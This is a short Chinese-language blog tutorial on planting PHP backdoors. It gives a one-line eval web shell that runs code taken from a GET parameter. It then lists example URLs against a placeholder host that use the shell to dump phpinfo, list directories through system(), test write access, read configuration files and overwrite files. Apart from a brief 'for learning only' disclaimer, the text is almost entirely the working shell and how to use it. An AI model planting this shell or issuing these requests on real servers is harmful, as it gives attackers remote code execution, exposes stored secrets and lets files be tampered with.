作者:阿dai哥
关于分享说明
About sharing instructions
我为什么要写这篇文章?我写这篇文章的出发点不是教会大家去写什么木马病毒之类的程序,而是分享一下我自己的一个想法,希望这次只是一次简单的学习分享,程序猿都要有自己的底线和初衷。否则就浪费了我写这文章的初心了。
什么是后门?
What is a back door?
今天我就来说一些最常见的PHP留后门的一些用法和注意的地方,也就是大家经常说的木马病毒,哈哈,不要作坏事哦!
实现代码步骤
Code implementation steps
1、<?php eval($_GET['evl']);
就这样,你已经得这台服务器上得很多执行权限了,这是一个比较简单得一种形式。那么使用得场景又有哪些呢?
A:打印服务器:phpinfo
http://www.ceshi.com/a.php?evl=phpinfo()
B:查看某个目录下有什么文件之类的
http://www.ceshi.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
C:查看目录是否可写,接下来就可以在可写的目录里创建可执行的文件了
http://www.ceshi.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
D:获取某个文件的内容,一般的情况是涌来读取配置文件的,具体的看自己需求
http://www.ceshi.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
E:对某个可写目录进行写如文件操作
http://www.ceshi.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
好咯,以上基本已经可以完成对一个服务器的查看的部分破坏了,如果你想要其它的功能就根据这几条举一反三操作就可以了。这是一些关注PHP后门的简单留门场景,也是一些常用的隐藏方法,时就先写这几个场景把!